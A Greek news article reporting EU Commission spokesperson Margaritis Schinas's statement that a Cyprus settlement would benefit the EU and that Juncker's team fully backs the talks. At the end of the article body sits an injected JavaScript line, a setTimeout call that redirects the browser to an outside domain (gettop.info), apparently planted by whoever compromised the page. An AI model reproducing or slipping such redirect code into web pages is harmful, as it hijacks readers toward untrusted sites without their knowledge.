Κομισιόν: «Ευεργετικές συνέπειες» για την ΕΕ μία λύση στο Κυπριακό

0
2

 

Ο εκπρόσωπος της Ευρωπαϊκής Επιτροπής, Μαργαρίτης Σχοινάς εξέφρασε την άποψη ότι μια λύση στο Κυπριακό θα έχει «ευεργετικές συνέπειες» για την ΕΕ και συνπλήρωσε ότι γι’ αυτόν τον λόγο η Επιτροπή και ο πρόεδρος Γιούνκερ «εμπλέκονται πλήρως» στην αναζήτηση λύσης.

«Παρακολουθούμε από κοντά τις συνομιλίες και η Επιτροπή επαναβεβαίωνει την εμπιστοσύνη της στην προσήλωση και των δύο ηγετών έτσι ώστε να μπει ένα τέλος στα προβλήματα της Κύπρου που εκκρεμούν» τόνισε, επαναλαμβάνοντας πως η Επιτροπή «καλεί όλες τις πλευρές να συνεχίσουν τις διαπραγματεύσεις, όπως άλλωστε φαίνεται να γίνεται».

«Και οι δύο ηγέτες ξέρουν ότι έχουν την απόλυτη στήριξη της Ευρωπαϊκής Επιτροπής και του προέδρου Γιούνκερ, καθώς είμαστε έτοιμοι να παράσχουμε όποια βοήθεια χρειάζεται στις δύο πλευρές και τα Ηνωμένα Έθνη σε αυτή τη διαδικασία», ανέφερε ο Μ. Σχοινάς και κατέληξε λέγοντας: «Είναι προφανές ότι μια λύση στο Κυπριακό πρόβλημα θα έχει ευεργετικές συνέπειες για την ΕΕ και όχι μόνο, γι’ αυτό ο πρόεδρος Γιούνκερ και η ομάδα του έχουν πλήρως εμπλακεί και στηρίζουν τις προσπάθειες». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here